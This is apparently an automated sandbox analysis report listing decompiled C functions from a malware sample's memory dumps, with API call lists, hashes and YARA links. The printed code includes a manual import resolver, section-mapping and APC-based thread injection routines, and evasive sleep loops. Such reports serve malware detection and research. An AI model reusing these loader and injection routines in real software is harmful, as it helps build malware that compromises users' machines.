
Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: fdfc8eb7641966732f523d421cb99650f1c7526e3114524de15ffc378fe03c39
Instruction ID: 649401511c9c24844842f621b26e88d86ae66ec0d033da79efe52631073b95b3
Opcode Fuzzy Hash: fdfc8eb7641966732f523d421cb99650f1c7526e3114524de15ffc378fe03c39
Instruction Fuzzy Hash: 37E0B874640245FAE750E7929D0AFBD76F8A700B46F500184F791DA1C1D7749A049765

Uniqueness

Uniqueness Score: -1.00%

Function 010E1F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010E1F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x10e41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x010e1f7c
0x010e1f85
0x010e1f8a
0x010e1f90
0x010e1f99
0x010e1f9f
0x010e1fa1
0x010e1fa4
0x010e1fa9
0x010e1fb0
0x010e1fb0
0x010e1fb4
0x010e1fbc
0x010e1fbf
0x00000000
0x00000000
0x010e1fc5
0x010e1fcf
0x010e1fd1
0x010e1fd4
0x010e1fd7
0x010e1fdb
0x010e1fe3
0x010e1fe5
0x010e1fe8
0x010e2050
0x010e2050
0x010e2054
0x00000000
0x00000000
0x010e1fed
0x010e1ff3
0x010e1ff5
0x010e2008
0x010e200b
0x010e200b
0x010e200b
0x010e200f
0x010e1ff7
0x010e1ff7
0x010e1fff
0x010e2001
0x00000000
0x00000000
0x00000000
0x00000000
0x010e2001
0x010e1fef
0x010e1fef
0x010e2003
0x010e2003
0x010e2003
0x010e2012
0x010e2015
0x010e2017
0x010e201e
0x010e2019
0x010e2019
0x010e2019
0x010e2026
0x010e202c
0x010e202e
0x010e205e
0x010e2030
0x010e2030
0x010e2033
0x010e2035
0x010e203d
0x010e203d
0x010e2042
0x010e2044
0x010e204b
0x010e204d
0x010e204d
0x010e204d
0x00000000
0x010e204d
0x00000000
0x010e202e
0x010e1fdd
0x010e1fdf
0x010e1fe1
0x00000000
0x00000000
0x010e1fe1
0x010e2061
0x010e2061
0x010e2068
0x010e206d
0x00000000
0x00000000
0x010e2073
0x010e207e
0x00000000
0x010e207e
0x010e2075
0x010e2075
0x010e207b
0x00000000
0x010e207b
0x010e1fa9
0x010e207f
0x010e2084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 010E1FB4
GetProcAddress.KERNEL32(?,00000000), ref: 010E2026

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 9d279dc2715273d601137d151e041c5bed83f6d1bebd098e4d858044efd386d7
Instruction ID: 6e80466ac56674b9dc7f89cb0214bee15d30237ed4d170ae8197d1a102d361d4
Opcode Fuzzy Hash: 9d279dc2715273d601137d151e041c5bed83f6d1bebd098e4d858044efd386d7
Instruction Fuzzy Hash: C2313E71A00209DFDB54CF5AC888AADBFF9FF54310B1440AAE985E7286E775DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010E1EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010E1EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x010e1ed9
0x010e1edf
0x010e1eed
0x010e1ef4
0x010e1ef9
0x010e1eff
0x00000000
0x010e1f00
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,010E1C0E,00000002,00000000,?,?,00000000,?,?,010E1C0E,00000000), ref: 010E1EF4

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: bc62e5850908cd94d7e507e1304624cdf8c0a077e47808ac8e2ae58cda032b49
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 69F012B690420CBFDB119FA5CC89C9FBBFDEB48354B104939F552E1190D6309E088A60

Uniqueness

Uniqueness Score: -1.00%

Function 010E1C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E010E1C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E010E1F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E010E18AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E010E1ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E010E13D1(E010E14E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E010E134F(_t45,  &_v48) != 0) {
					 *0x10e41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x10e41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E010E1B58(_t50 + _t15);
				 *0x10e41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E010E142F(_t44);
					goto L11;
				}
			}

0x010e1c89
0x010e1c92
0x010e1c96
0x010e1d9e
0x010e1da4
0x00000000
0x00000000
0x00000000
0x010e1c9c
0x010e1c9c
0x010e1ca1
0x010e1ca7
0x010e1cb6
0x010e1cb7
0x010e1cba
0x010e1cbd
0x010e1cc6
0x010e1cca
0x010e1cd0
0x010e1cd4
0x010e1cdb
0x00000000
0x00000000
0x010e1ce1
0x010e1ce8
0x010e1cec
0x010e1d8f
0x010e1d8f
0x010e1d96
0x010e1d98
0x010e1d98
0x00000000
0x010e1d96
0x010e1cf5
0x010e1d48
0x010e1d48
0x010e1d59
0x010e1d5d
0x010e1d8b
0x010e1d5f
0x010e1d62
0x010e1d6a
0x010e1d6e
0x010e1d76
0x010e1d76
0x010e1d7d
0x010e1d7d
0x00000000
0x010e1d5d
0x010e1d03
0x010e1d42
0x00000000
0x010e1d42
0x010e1d05
0x010e1d09
0x010e1d12
0x010e1d14
0x010e1d18
0x010e1d3a
0x010e1d3a
0x00000000
0x010e1d3a
0x010e1d1a
0x010e1d1f
0x010e1d26
0x010e1d2b
0x00000000
0x010e1d2d
0x010e1d30
0x010e1d33
0x00000000
0x010e1d33

APIs

Part of subcall function 010E1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,010E1C8E,74B063F0,00000000), ref: 010E1F1F
Part of subcall function 010E1F10: GetVersion.KERNEL32 ref: 010E1F2E
Part of subcall function 010E1F10: GetCurrentProcessId.KERNEL32 ref: 010E1F3D
Part of subcall function 010E1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 010E1F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 010E1CA1
SwitchToThread.KERNEL32 ref: 010E1CA7

Part of subcall function 010E18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 010E1903
Part of subcall function 010E18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 010E19C9

Sleep.KERNELBASE(00000000,00000000), ref: 010E1CCA
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 010E1D12
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 010E1D30
WaitForSingleObject.KERNEL32(00000000,000000FF,010E14E8,?,00000000), ref: 010E1D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 010E1D76
CloseHandle.KERNEL32(00000000), ref: 010E1D7D
GetLastError.KERNEL32(010E14E8,?,00000000), ref: 010E1D85
GetLastError.KERNEL32 ref: 010E1D98

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 812a861c7ff651316de5a6a90a166bd77b69d7a50459afea6e71cf25b298954b
Instruction ID: fc712a6d156087c3995a80ab429ef7012e1eaf1958d27d92ede40e1372790227
Opcode Fuzzy Hash: 812a861c7ff651316de5a6a90a166bd77b69d7a50459afea6e71cf25b298954b
Instruction Fuzzy Hash: 63316271508311AF8761FF7B984C9AF7FECBA85650B10095AF9E0CB140EB75C54087A2

Uniqueness

Uniqueness Score: -1.00%

Function 01125220, Relevance: 10.8, APIs: 7, Instructions: 317COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0112525E
GetFileType.KERNEL32(?), ref: 011254C7

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: 256bf76168c142aa4da4ec50bd5897b07b267cd5e5253b21ca1e4123cbeacc50
Instruction ID: 402614a79b8074ae2f94f7fa19165887edb33b4ef181dab55122e86d1ce199df
Opcode Fuzzy Hash: 256bf76168c142aa4da4ec50bd5897b07b267cd5e5253b21ca1e4123cbeacc50
Instruction Fuzzy Hash: A2E12474E04258CFDB38CFA8D894AADFBB2BB49314F24825DD825AB396C7319851CF51

Uniqueness

Uniqueness Score: -1.00%

Function 011D6B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E011D6B0F(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x11da290 = _t14;
				if(_t14 != 0) {
					 *0x11da180 = GetTickCount();
					_t16 = E011D4C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L011D7EEA();
						_t40 = _t18 + _t20;
						_t22 = E011D414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x11da2ac; // 0x23c
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x11da2b8 = 1;
						}
					}
					_t16 = E011D53F2(_t33);
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x011d6b0f
0x011d6b24
0x011d6b2c
0x011d6b31
0x011d6b44
0x011d6b49
0x011d6b50
0x011d6bd8
0x011d6bde
0x00000000
0x00000000
0x00000000
0x011d6b56
0x011d6b56
0x011d6b5b
0x011d6b61
0x011d6b67
0x011d6b71
0x011d6b75
0x011d6b76
0x011d6b7b
0x011d6b7c
0x011d6b7d
0x011d6b82
0x011d6b88
0x011d6b91
0x011d6b97
0x011d6b9d
0x011d6ba2
0x011d6ba9
0x011d6bad
0x011d6bb5
0x011d6bbd
0x011d6bbf
0x011d6bbf
0x011d6bc7
0x011d6bc9
0x011d6bc9
0x011d6bc7
0x011d6bd3
0x00000000
0x011d6bd3
0x011d6b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 011D6B24
GetTickCount.KERNEL32 ref: 011D6B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 011D6B5B
SwitchToThread.KERNEL32(?,00000001), ref: 011D6B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 011D6B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 011D6B97
IsWow64Process.KERNEL32(0000023C,?,?,00000001), ref: 011D6BB5

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 4b89e19cc6f65be831119ba92786894c7089349ee43ee966d245eb9a7d617e16
Instruction ID: f11a287f3014e86bfd1ec2baa6690dc00e4790884da598e22f57e8b64f4974bf
Opcode Fuzzy Hash: 4b89e19cc6f65be831119ba92786894c7089349ee43ee966d245eb9a7d617e16
Instruction Fuzzy Hash: A621E7B2A06218AFD728EF79E888A6A77DCEB54354F00493DF559C7140E774D884CF61

Uniqueness

Uniqueness Score: -1.00%

Function 010E1060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010E1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E010E1B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10e41d0 + 0x10e5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10e41d0 + 0x10e50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E010E142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10e41d0 + 0x10e50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10e41d0 + 0x10e5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10e41d0 + 0x10e5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10e41d0 + 0x10e512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E010E1B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x010e106e
0x010e1072
0x010e1133
0x010e1078
0x010e1090
0x010e109f
0x010e10a6
0x010e10aa
0x010e10ad
0x010e112b
0x010e112c
0x010e10af
0x010e10bc
0x010e10c0
0x010e10c3
0x00000000
0x010e10c5
0x010e10d2
0x010e10d6
0x010e10d9
0x00000000
0x010e10db
0x010e10e8
0x010e10ec
0x010e10ef
0x00000000
0x010e10f1
0x010e10fe
0x010e1102
0x010e1105
0x00000000
0x010e1107
0x010e110d
0x010e1113
0x010e1118
0x010e111f
0x010e1122
0x00000000
0x010e1124
0x010e1127
0x010e1127
0x010e1122
0x010e1105
0x010e10ef
0x010e10d9
0x010e10c3
0x010e10ad
0x010e1141

APIs

Part of subcall function 010E1B58: HeapAlloc.KERNEL32(00000000,?,010E1702,?,00000000,00000000,?,?,?,010E1CE6), ref: 010E1B64

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,010E1480,?,?,?,?,00000002,00000000,?,?), ref: 010E1084
GetProcAddress.KERNEL32(00000000,?), ref: 010E10A6
GetProcAddress.KERNEL32(00000000,?), ref: 010E10BC
GetProcAddress.KERNEL32(00000000,?), ref: 010E10D2
GetProcAddress.KERNEL32(00000000,?), ref: 010E10E8
GetProcAddress.KERNEL32(00000000,?), ref: 010E10FE

Part of subcall function 010E1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 010E1BF9
Part of subcall function 010E1B9C: memset.NTDLL ref: 010E1C1B

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 0bc1beb6569f57e7271539afabd04e61122157056e6d639d884e2bfda4a6bb4b
Instruction ID: b36a886eac881ee81e58313e4036cb455b4168363230301e4c64371e13f1ec09
Opcode Fuzzy Hash: 0bc1beb6569f57e7271539afabd04e61122157056e6d639d884e2bfda4a6bb4b
Instruction Fuzzy Hash: BD21A6B560060A9FDB60DF6FEC88D9A7BFCFB04644B0148A5FA85CB215E735E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010E1DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10e4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x10e418c;
						if( *0x10e418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10e4198;
								if( *0x10e4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x10e418c);
						}
						HeapDestroy( *0x10e4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10e4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10e4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10e41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E010E13D1(E010E20CE, E010E121C(_a12, 1, 0x10e4198, _t41));
							 *0x10e418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x010e1db1
0x010e1dbd
0x010e1dbf
0x010e1dc2
0x010e1e38
0x010e1e3e
0x010e1e40
0x010e1e42
0x010e1e48
0x010e1e4a
0x010e1e4f
0x010e1e52
0x010e1e5d
0x010e1e5f
0x00000000
0x00000000
0x010e1e61
0x010e1e64
0x010e1e66
0x00000000
0x00000000
0x00000000
0x010e1e66
0x010e1e6e
0x010e1e6e
0x010e1e7a
0x010e1e7a
0x010e1dc4
0x010e1dc5
0x010e1de5
0x010e1deb
0x010e1ded
0x010e1df2
0x010e1e2e
0x010e1e2e
0x010e1df4
0x010e1dfc
0x010e1e03
0x010e1e0d
0x010e1e19
0x010e1e20
0x010e1e25
0x010e1e2a
0x00000000
0x010e1e2a
0x010e1e25
0x010e1df2
0x010e1dc5
0x010e1e87

APIs

InterlockedIncrement.KERNEL32(010E4188), ref: 010E1DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 010E1DE5

Part of subcall function 010E13D1: CreateThread.KERNEL32 ref: 010E13E8
Part of subcall function 010E13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 010E13FD
Part of subcall function 010E13D1: GetLastError.KERNEL32(00000000), ref: 010E1408
Part of subcall function 010E13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 010E1412
Part of subcall function 010E13D1: CloseHandle.KERNEL32(00000000), ref: 010E1419
Part of subcall function 010E13D1: SetLastError.KERNEL32(00000000), ref: 010E1422

InterlockedDecrement.KERNEL32(010E4188), ref: 010E1E38
SleepEx.KERNEL32(00000064,00000001), ref: 010E1E52
CloseHandle.KERNEL32 ref: 010E1E6E
HeapDestroy.KERNEL32 ref: 010E1E7A

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: a71a6568faa2fd75270c4c05ab62406f3b2559e3949d6adbe2702d1d7f38d0e2
Instruction ID: 8928cb0122c0c15503f5719dcf052832bbcf68c234d3dbd515a94ac39bef6af9
Opcode Fuzzy Hash: a71a6568faa2fd75270c4c05ab62406f3b2559e3949d6adbe2702d1d7f38d0e2
Instruction Fuzzy Hash: BD219071B00205AFDB609FAFEC8CA6A7FE9F754B6071401A9F6D5DB244D639C900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010E13D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010E13D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10e41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x010e13e8
0x010e13ee
0x010e13f2
0x010e13fd
0x010e1405
0x010e140e
0x010e1412
0x010e1419
0x010e1420
0x010e1422
0x010e1428
0x010e1405
0x010e142c

APIs

CreateThread.KERNEL32 ref: 010E13E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 010E13FD
GetLastError.KERNEL32(00000000), ref: 010E1408
TerminateThread.KERNEL32(00000000,00000000), ref: 010E1412
CloseHandle.KERNEL32(00000000), ref: 010E1419
SetLastError.KERNEL32(00000000), ref: 010E1422

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
